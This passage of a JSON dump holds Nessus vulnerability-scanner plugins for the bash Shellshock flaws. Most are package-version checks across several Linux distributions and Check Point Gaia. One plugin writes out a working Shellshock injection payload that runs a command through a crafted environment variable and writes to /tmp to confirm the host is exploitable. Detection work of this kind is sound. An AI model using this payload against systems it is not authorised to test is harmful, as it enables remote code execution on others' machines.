pkgname:\"bash\", pkgver:\"4.1.012\", 
pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:13", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : bash (OVMSA-2014-0022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2014-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/78238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# 
The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78238);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.2 : bash (OVMSA-2014-0022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000223.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6f4b2b7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:32", "description": "The remote host is running a version of Bash that is vulnerable to command injection via 
environment variable manipulation. Depending on the configuration of the system, an attacker can remotely execute arbitrary code.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-13T00:00:00", "type": "nessus", "title": "Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_7169.NASL", "href": "https://www.tenable.com/plugins/nessus/78385", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78385);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. 
Depending on\nthe configuration of the system, an attacker can remotely execute\narbitrary code.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate updates.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"HostLevelChecks/proto\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude('ssh_func.inc');\ninclude('telnet_func.inc');\ninclude('hostlevel_funcs.inc');\ninclude('data_protection.inc');\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nvar proto = get_kb_item_or_exit('HostLevelChecks/proto');\n\nvar port = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nvar info_t;\n\nif (proto == 'local')\n info_t = INFO_LOCAL;\nelse if (proto == 'ssh')\n{\n info_t = INFO_SSH;\n var ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n}\nelse\n exit(0, 'This plugin only attempts to run commands locally or via SSH, and neither is available against the remote host.');\n\n var AIX_Check = get_kb_item(\"Host/AIX/version\");\n if (!isnull(AIX_Check) && AIX_Check =~ '^AIX-[0-5].')\n {\n if(info_t == INFO_SSH) ssh_close_connection();\n exit(0, \"Commands are not supported on AIX 5.1 and below\");\n }\nelse\n var command = \"cd /tmp && X='() { (a)=>\\' bash -c 'echo /usr/bin/id' && cat /tmp/echo && rm /tmp/echo\";\n var output = info_send_cmd(cmd:command);\n\n if(info_t == INFO_SSH) ssh_close_connection();\n if (output !~ \"uid=[0-9]+.*gid=[0-9]+.*\") audit(AUDIT_HOST_NOT, \"affected.\");\n\nvar report =\n '\\n' + 'Nessus was able to exploit a flaw in the patch for CVE-2014-7169' +\n '\\n' + 'and write to a file on the target system.' 
+\n '\\n' +\n '\\n' + 'File contents :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:output) +\n '\\n' +\n '\\n' + 'Note: Nessus has attempted to remove the file from the /tmp directory.\\n';\nsecurity_report_v4(port:port,extra:report,severity:SECURITY_HOLE);\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T16:18:21", "description": "The remote host is running a version of Gaia OS which is affected by issues related to the SHELLSHOCK set of vulnerabilities in bash. An error exists in the bash functionality that evaluates specially formatted environment variables passed to it from another environment, which may result in remote code execution.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:check_point:gaia_os"], "id": "CHECK_POINT_GAIA_SK102673.NASL", "href": "https://www.tenable.com/plugins/nessus/104997", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104997);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Gaia OS which is affected by 
issues\nrelated to the SHELLSHOCK set of vulnerabilities in bash. An error in the bash \nfunctionality that evaluates specially formatted environment variables passed \nto it from another environment, which may result in remote code execution.\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8d7a5ca\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk104443&partition=General&product=Security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba5b918a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to an unaffected version or apply vendor-supplied hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:check_point:gaia_os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"check_point_gaia_os_version.nbin\");\n script_require_keys(\"Host/Check_Point/version\", \"Host/Check_Point/installed_hotfixes\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Gaia Operating System\";\nversion = get_kb_item_or_exit(\"Host/Check_Point/version\");\nhfs = get_kb_item_or_exit(\"Host/Check_Point/installed_hotfixes\");\nvuln = FALSE;\n\nif (version =~ \"R7[01]\")\n{\n vuln = TRUE;\n fix = \"Upgrade to an unaffected version or contact Checkpoint support.\";\n}\nelse if (version =~ \"R75\\.4[0567]\" || version =~ \"R76\" || version =~ \"R77(\\.[12]0)?$\")\n{\n if(!(\"sk102673\" >< hfs && \"sk104443\" >< hfs))\n vuln = TRUE;\n fix = \"Apply Hotfix sk102673 or sk104443\";\n}\nelse\n audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n\nif(vuln)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fix : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:22", "description": "The remote host is affected by the vulnerability described in GLSA-201409-10 (Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to 
inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n Impact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary commands even in restricted environments.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201409-10.NASL", "href": "https://www.tenable.com/plugins/nessus/77886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77886);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"GLSA\", value:\"201409-10\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-10\n(Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function\n definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary\n commands even in restricted environments.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Bash 3.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.1_p18-r1:3.1'\n All Bash 3.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.2_p52-r1:3.2'\n All Bash 4.0 users should upgrade to the latest version:\n # emerge 
--sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.0_p39-r1:4.0'\n All Bash 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.1_p12-r1:4.1'\n All Bash 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.2_p48-r1'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-shells/bash\", unaffected:make_list(\"rge 3.1_p18-r1\", \"rge 3.2_p52-r1\", 
\"rge 4.0_p39-r1\", \"rge 4.1_p12-r1\", \"ge 4.2_p48-r1\"), vulnerable:make_list(\"lt 4.2_p48-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:57", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169 ). With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Debian DSA-3035-1 : bash - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bash", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3035.NASL", "href": "https://www.tenable.com/plugins/nessus/77882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3035. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77882);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"DSA\", value:\"3035\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Debian DSA-3035-1 : bash - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 ). With this update prefix and\nsuffix for environment variable names which contain shell functions\nare added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/bash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2014/dsa-3035\");\n 
script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the bash packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.2+dfsg-0.1+deb7u3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bash\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-builtins\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-doc\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bash-static\", reference:\"4.2+dfsg-0.1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:05", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). With this update prefix and suffix for environment variable names which contain shell functions are added as hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are fixed which were revealed in Red Hat's internal analysis for these issues and also independently reported by Todd Sabin.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
